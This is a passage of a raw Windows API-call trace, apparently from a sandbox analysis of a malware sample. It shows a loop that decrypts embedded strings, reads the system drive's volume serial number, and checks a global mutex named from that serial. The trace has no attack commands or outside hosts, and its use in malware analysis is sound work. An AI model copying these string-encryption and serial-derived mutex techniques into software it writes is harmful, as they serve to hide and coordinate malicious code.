[0166.576] CloseHandle (hObject=0x1c0) returned 1 [0166.576] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0166.576] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0166.576] Sleep (dwMilliseconds=0x3e8) [0167.664] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0167.664] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0167.664] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0167.664] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0167.664] CryptDestroyKey (hKey=0x29c020) returned 1 [0167.664] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0167.664] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0167.664] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0167.664] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0167.664] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0167.664] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0167.664] CryptDestroyKey (hKey=0x29c020) returned 1 [0167.664] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0167.664] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0167.664] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0167.664] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0167.664] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0167.664] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0167.664] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0167.664] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0167.664] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0167.664] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0167.664] CryptDestroyKey (hKey=0x29c020) returned 1 [0167.664] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0167.664] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0167.664] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0167.664] CloseHandle (hObject=0x1c0) returned 1 [0167.665] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0167.665] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0167.665] Sleep (dwMilliseconds=0x3e8) [0168.676] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0168.676] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0168.676] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0168.676] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0168.676] CryptDestroyKey (hKey=0x29c020) returned 1 [0168.676] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0168.676] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0168.677] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0168.677] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0168.677] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0168.677] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0168.677] CryptDestroyKey (hKey=0x29c020) returned 1 [0168.677] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0168.677] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0168.677] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0168.677] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0168.677] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0168.677] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0168.677] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0168.677] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0168.677] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0168.677] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0168.677] CryptDestroyKey (hKey=0x29c020) returned 1 [0168.677] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0168.677] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0168.677] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0168.677] CloseHandle (hObject=0x1c0) returned 1 [0168.677] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0168.677] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0168.677] Sleep (dwMilliseconds=0x3e8) [0169.690] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0169.690] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0169.691] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0169.691] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0169.691] CryptDestroyKey (hKey=0x29c020) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0169.691] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0169.691] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0169.691] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0169.691] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0169.691] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0169.691] CryptDestroyKey (hKey=0x29c020) returned 1 [0169.691] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0169.691] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0169.691] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0169.691] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0169.691] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0169.691] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0169.691] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0169.691] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0169.691] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0169.691] CryptDestroyKey (hKey=0x29c020) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0169.691] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0169.691] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0169.691] CloseHandle (hObject=0x1c0) returned 1 [0169.691] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0169.691] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0169.691] Sleep (dwMilliseconds=0x3e8) [0170.705] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0170.705] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0170.705] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0170.705] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0170.705] CryptDestroyKey (hKey=0x29c020) returned 1 [0170.705] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0170.705] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0170.705] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0170.705] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0170.705] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0170.705] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0170.705] CryptDestroyKey (hKey=0x29c020) returned 1 [0170.705] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0170.705] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0170.705] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0170.705] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0170.705] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0170.706] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0170.706] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0170.706] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0170.706] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0170.706] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0170.706] CryptDestroyKey (hKey=0x29c020) returned 1 [0170.706] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0170.706] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0170.706] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0170.706] CloseHandle (hObject=0x1c0) returned 1 [0170.706] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0170.706] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0170.706] Sleep (dwMilliseconds=0x3e8) [0171.719] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0171.719] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0171.719] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0171.719] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0171.719] CryptDestroyKey (hKey=0x29c020) returned 1 [0171.719] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0171.719] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0171.719] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0171.719] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0171.719] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0171.719] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0171.719] CryptDestroyKey (hKey=0x29c020) returned 1 [0171.719] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0171.719] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0171.719] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0171.719] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0171.719] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0171.720] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0171.720] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0171.720] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0171.720] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0171.720] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0171.720] CryptDestroyKey (hKey=0x29c020) returned 1 [0171.720] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0171.720] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0171.720] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0171.720] CloseHandle (hObject=0x1c0) returned 1 [0171.720] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0171.720] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0171.720] Sleep (dwMilliseconds=0x3e8) [0172.857] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0172.857] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0172.857] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0172.857] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0172.858] CryptDestroyKey (hKey=0x29c020) returned 1 [0172.858] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0172.858] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0172.858] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0172.858] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0172.858] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0172.858] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0172.858] CryptDestroyKey (hKey=0x29c020) returned 1 [0172.858] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0172.858] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0172.858] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0172.858] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0172.858] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0172.858] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0172.858] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0172.858] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0172.858] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0172.858] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0172.858] CryptDestroyKey (hKey=0x29c020) returned 1 [0172.858] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0172.858] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0172.858] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0172.858] CloseHandle (hObject=0x1c0) returned 1 [0172.858] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0172.859] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0172.859] Sleep (dwMilliseconds=0x3e8) [0173.880] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0173.880] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0173.880] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0173.880] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0173.880] CryptDestroyKey (hKey=0x29c020) returned 1 [0173.881] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0173.881] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0173.881] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0173.881] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0173.881] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0173.881] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0173.881] CryptDestroyKey (hKey=0x29c020) returned 1 [0173.881] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0173.881] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0173.881] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0173.881] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0173.881] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0173.881] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0173.881] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0173.881] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0173.881] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0173.881] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, 